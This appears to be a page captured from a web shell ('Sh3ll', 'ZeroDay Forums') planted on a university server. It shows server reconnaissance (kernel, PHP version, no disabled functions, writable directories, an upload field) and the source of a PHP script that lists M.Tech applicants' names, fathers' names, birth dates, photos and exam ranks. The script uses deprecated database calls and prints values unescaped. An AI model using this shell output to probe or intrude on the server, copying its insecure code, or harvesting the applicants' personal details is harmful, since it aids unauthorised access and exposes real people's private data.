Sh3ll
OdayForums


Server : Apache
System : Linux profile 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
User : apache ( 48)
PHP Version : 8.0.28
Disable Function : NONE
Directory :  /var/www/html/mmishra/indem/webbioexam/biomedical/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //var/www/html/mmishra/indem/webbioexam/biomedical/showstatus.php
<center><table><tr><td colspan=2 align=center><h2>Indian Institute of Information Technology Allahabad</h2></td></tr>
<tr><td width=20% align=center><img src="logo.gif" width="75" height="78" /></td>
    <td width=80% align=center>
	(A University under Section 3 0f UGC Act 1956)<br>
        A Centre of Excellence in Information  Technology, Estd. By Min. of HRD, Govt. of India,  New Delhi<br>
        Devghat Jhalwa, Allahabad &ndash;  211012, U.P. (INDIA)<br>
        Ph: 0532-2922025,2922067 Fax: 0532-2922081 <br>
        Web: <a href="http://www.iiita.ac.in/">www.iiita.ac.in</a> Email: <a href="mailto:mtech@iiita.ac.in">mtech@iiita.ac.in</a>
    </td></tr>
</table>
<hr><h3>Online Applicantion Received For M. Tech. 2012-2013 </h3></center>
<?php
include "javafunctions.inc";
include "functions.inc";
dbConnect();


$tbl = 'tbl_registration';
$sno = 0;

echo "<center> 
<table border=1>
<tr><td><b>Sr No.</b></td>
<td><b>Registration ID</b></td>
<td><b>Stream</b></td>
<td><b>Photo</b></td>
<td><b>Applicant Name</b></td>
<td><b>Father Name</b></td>
<td><b>DoB</b></td>
<td><b>GATE Name</b></td>
<td><b>GATE Discipline</b></td>
<td><b>GATE Rank</b></td>
<td><b>GATE Year</b></td>
<td><b>Category</b></td>
</tr>";

$rs = mysql_query("select * from $tbl where status='Paid' order by fullname asc");
while ($o = mysql_fetch_object($rs)) {
	if ($fullname == strtoupper(trim($o->fullname))) {
	} else {
		$fullname = strtoupper(trim($o->fullname));
		$id = $o->id;
		$sno = $sno + 1;

		$regid = $o->regid;
		$dob = $o->dob;
		$pob = $o->pob;
		$gender = $o->gender;
		$nationality = $o->nationality;
		$fathername = $o->fathername;
		$address = $o->address;
		$state = $o->state;
		$pincode = $o->pincode;
		$phone = $o->phone;
		$fax = $o->fax;
		$email = $o->email;
		$txntype = $o->txntype;
		$txnnumber = $o->txnnumber;
		$amount = $o->amount;
		$depositdate = $o->depositdate;
		$bankbranch = $o->bankbranch;
		$stream = $o->stream;
		$bi = $o->bi;
		$hci = $o->hci;
		$ins = $o->ins;
		$mi = $o->mi;
		$ro = $o->ro;
		$se = $o->se;
		$wcc = $o->wcc;
		$ce = $o->ce;
		$category = $o->category;
		$ge_name = $o->ge_name;
		$ge_discipline = $o->ge_discipline;
		$ge_rank = $o->ge_rank;
		$ge_year = $o->ge_year;
		$qd_university = $o->qd_university;
		$qd_discipline = $o->qd_discipline;
		$qd_degree = $o->qd_degree;
		$qd_examdate = $o->qd_examdate;
		$qd_finalresultexpectedby = $o->qd_finalresultexpectedby;
		$qd_minmarks = $o->qd_minmarks;
		$qd_overallgrade = $o->qd_overallgrade;
		$we_datefrom1 = $o->we_datefrom1;
		$we_dateto1 = $o->we_dateto1;
		$we_employer1 = $o->we_employer1;
		$we_position1 = $o->we_position1;
		$we_nature1 = $o->we_nature1;
		$we_datefrom2 = $o->we_datefrom2;
		$we_dateto2 = $o->we_dateto2;
		$we_employer2 = $o->we_employer2;
		$we_position2 = $o->we_position2;
		$we_nature2 = $o->we_nature2;
		$we_datefrom3 = $o->we_datefrom3;
		$we_dateto3 = $o->we_dateto3;
		$we_employer3 = $o->we_employer3;
		$we_position3 = $o->we_position3;
		$we_nature3 = $o->we_nature3;
		$photo = $o->photo;
		$app_status = $o->app_status;
		echo "<tr>
		<td>".$sno."</td>
		<td>".$regid."</td>
		<td>".$stream."</td>
		<td><img src='photos/$id.jpg' height='50' width='50' /></td>
		<td>".ucwords($fullname)."</td>
		<td>".ucwords($fathername)."</td>
		<td>".$dob."<br></td>
		<td>".$ge_name."</td>
		<td>".$ge_discipline."</td>
		<td>".$ge_rank."</td>
		<td>".$ge_year."</td>
		<td>".$category."</td>
      		</tr>";
	}
}
echo "
</table></center>
";
?>

ZeroDay Forums Mini